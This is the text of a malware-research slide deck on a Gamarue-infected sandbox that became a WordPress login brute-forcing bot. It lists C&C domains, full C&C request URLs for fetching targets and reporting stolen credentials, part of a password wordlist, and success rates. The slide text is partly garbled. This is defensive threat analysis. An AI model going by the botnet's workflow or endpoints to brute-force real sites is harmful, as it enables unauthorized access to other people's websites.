Insights of a brute-forcing botnet

Veronica Valeros Cognitive Threat Analytics

Cisco Systems, Czech Republic

About me Malware Researcher Cognitive Threat Analytics (cognitive.cisco.com) What I do?

•  Analysis of network traffic •  Behavioral analysis of malware •  Threat categorization •  Malware sandboxing

Also: •  Quadcopters, lockpicking, gaming, traveling

Twi$er:@verovaleros

LinkedIn:/in/veronicavalerossaracho

Github:/verovaleros

Cisco:blogs.cisco.com/author/valeros

Hunting threats: what do we know about malware?

Intelligence gathering

Threat identification

Blogs

reports

trackers

Realtrafficsandboxing

twi$er

forums

Most of what we know about malware is from 1-5 minutes sandbox executions

Most sandbox solutions(1-5 minutes)

How does the malware behave after 5 minutes? After 1 hour?

There is just one way to know: to try it.

Experiment Setup Gamarue sample

Sanboxing environment: •  VirtualBox •  WindowsXP •  No guest additions

•  No user interaction •  No hardening measures for

VM-aware malware

Infection Overview

Gamarue C&C CharacterisEcs:

•  HTTPBasedC&C•  HTTPPOSTrequests•  Encrypteddatasent/received•  CustomUser-Agent“Mozilla/4.0”

•  ContactedC&Cservers:•  okiijlijlili.eu•  w4gvnlw4kjbvrbvshkvbsd.ru•  f34234f234f2sdcsv.info

The main C&C is the one in charge of shaping the infection scenario

The main C&C is the one in charge of shaping the infection scenario

XX

XX

XXX

XXX

XX

X=nochangeonthebehaviorofthebotnet

Newmalware

Brute-forcing botnet behavior

1.  Obtain a list of target WordPress sites to attempt to login from the C&C server.

2.  Attempt to login to the next site on the list with chosen credentials in order to gain access.

3.  If the login attempt was successful, report it to the C&C server.

4.  If the login attempt was unsuccessful, iterate from step 2) until exhausting the targets.

Brute-forcing C&C requests

(1) REPORT STATUS http://g.commandocenter.ru/default.aspx ?guid=dca94d1f-f7eb-487f-ad24- 923cd1b4f946&gate=1&good=- 1&bad=0&unlucky=1&ip=&fn= (2) RETRIEVE TARGETS http://g.commandocenter.ru/files/2/9d753bd0-33a5- 46ac-841d-f99d9ace3446.txt (3) SEND SUCCESS DATA http://g.commandocenter.ru/col.aspx ?t=wp b&g=1&gid=1

Brute-forcing C&C: report status

Brute-forcing C&C: retrieve targets

Brute-forcing C&C: send successful data

Brute-forcing C&C overview

REPORTSTATUS RETRIEVETARGETS SENDSUCCESSDATA

+86k custom passwords used

techno sciento biblioteka wroclaw media momb biblioteca teens cafe benessere playground helena guide mullion-shop albers-wende svenska-spelautomater survivalb

raumklimadecke dana capavle bondage bibliotheque modeistanbul virgulina svenskaspelautomater stephanierhea ravenna playgroundmusic pierrederoche pierre svet guidedtherapy galaktika enflick

dajuroka teentalk charlesmyrick businesscoaching business advertising advertise zorgverzekering xmarkstheearth xlgirls williampopp williammillsagency teens-generation tausend-moeglichkeiten sverigemastareiseo2011 surveyquest socialanna

sochy-14 shawnewbank shawkeller scienceofsexy rgb rautenstrauch playguitar ohiohypnosiscenter modedesign-studium mode-estah mode-b modculture merkur mediacube mediaclipsaustralia mediabiz-group marihuana

Highly aggressive botnet: thousands of targets attempted per day

+160k attempted logins

23 success cases

1 bot Every 7000 sites, 1 success 1 access every ~3.5 hours 6 accessed sites per day

Not a targeted attack: well distributed

Conclusions

•  Running malware for long term periods is worth trying.

•  Realistic sandbox environment is vital: without internet access we wouldn’t discovered this behavior.

•  The weakest link in security are still humans.

•  Education is the only long term solution.

Questions?

Veronica Valeros vvaleros@cisco.com

Cognitive Threat Analytics Cisco Systems, Czech Republic

Thank you.

Cisco Cognitive Threat Analytics (CTA) is a cloud-based breach detection and analytics technology focused on discovering novel and emerging threats by identifying C&C activity of malware. CTA processes web access logs from the Cisco Cloud Web Security (CWS), Cisco Web Security Appliance (WSA), or 3rd party web proxies such as Blue Coat ProxySG. CTA reduces time to discovery (TTD) of threats operating inside the network. It addresses gaps in perimeter-based defenses by identifying the symptoms of a malware infection or data breach using behavioral analysis and anomaly detection. The technology relies on advanced statistical modeling and machine learning to independently identify new threats, while constantly learning from what it sees and adapting over time. Through additional careful correlation, CTA presents 100% confirmed breaches to keep security teams focused on the particular devices that require a remediation. Focusing on C&C activity detection, CTA addresses a security visibility gap by discovering threats that may have entirely bypassed web as an infection vector (infections delivered through email, infected USB stick, BYOD).

About Cisco Cognitive Threat Analytics